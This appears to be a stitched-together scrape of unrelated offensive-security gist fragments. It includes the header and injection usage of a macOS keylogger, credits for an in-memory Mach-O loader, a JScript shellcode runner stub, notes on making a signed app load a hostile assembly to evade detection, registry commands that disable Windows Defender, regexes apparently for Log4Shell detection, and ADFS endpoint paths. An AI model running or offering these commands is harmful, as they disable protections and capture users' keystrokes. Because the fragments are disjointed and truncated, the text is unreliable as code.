| // How to build: "CC=clang go build" | |
| package main | |
| import ( | |
| "fmt" | |
| "net/url" | |
| "strconv" | |
| "unsafe" | |
| ) |
| // Info: | |
| // Universal macOS keylogger that tracks input locations. It's injected per app as it doesn't require having global keyboard capturing permission | |
| // Compilation: | |
| // gcc -dynamiclib /tmp/keylogger.m -o /tmp/keylogger.dylib -framework Foundation -framework Appkit -arch x86_64 -arch arm64 | |
| // Usage: | |
| // DYLD_INSERT_LIBRARIES=/tmp/keylogger.dylib /path/to/app/Contents/MacOS/App | |
| #import <Foundation/Foundation.h> |
| > cd /Applications/VMware Fusion.app/Contents/Library/VMware OVF Tool | |
| > ./ovftool --acceptAllEulas /Users/marco/Documents/Virtual\ Machines.localized/Windows\ 8.1\ x64.vmwarevm/Windows\ 8.1\ x64.vmx /Users/marco/Desktop/Win81.ova |
| /* | |
| ================================================================================ | |
| modified from this: https://github.com/its-a-feature/macos_execute_from_memory (supports only bundle) | |
| code injection : https://github.com/CylanceVulnResearch/osx_runbin by Stephanie Archibald (does not support m1 x64 emulation and FAT header) | |
| added FAT header (universal Macho) parsing | |
| script-kiddied, debugged, etc. by @exploitpreacher | |
| ================================================================================ | |
| */ |
| import re | |
| from urllib.parse import unquote | |
| FLAGS = re.IGNORECASE | re.DOTALL | |
| ESC_DOLLAR = r'(?:\$|\\u0024||\\x24|\\0?44|%24)' | |
| ESC_LCURLY = r'(?:\{|\\u007B|\\x7B|\\173|%7B)' | |
| ESC_RCURLY = r'(?:\}|\\u007D|\\x7D|\\175|%7D)' | |
| _BACKSLASH_ESCAPE_RE = re.compile(r'\\(?:u[0-9af]{4}|x[0-9af]{2}|[0-7]{,3})') | |
| _PERCENT_ESCAPE_RE = re.compile(r'%[0-9af]{2}') |
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| /* | |
| ================================================================================ | |
| modified from this: https://github.com/its-a-feature/macos_execute_from_memory (supports only bundle) | |
| code injection : https://github.com/CylanceVulnResearch/osx_runbin by Stephanie Archibald (does not support m1 x64 emulation and FAT header) | |
| added FAT header (universal Macho) parsing | |
| script-kiddied, debugged, etc. by @exploitpreacher | |
| ================================================================================ | |
| */ |
:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
:: Cloud-protection level
| /abs/ | |
| /adfs/ls | |
| /adfs/services/trust/13/windows | |
| /adfs/services/trust/13/windowsmixed | |
| /adfs/services/trust/13/windowstransport | |
| /adfs/services/trust/2005/windows | |
| /adfs/services/trust/2005/windowsmixed | |
| /adfs/services/trust/2005/windowstransport | |
| /Autodiscover | |
| /autodiscover/autodiscover.xml |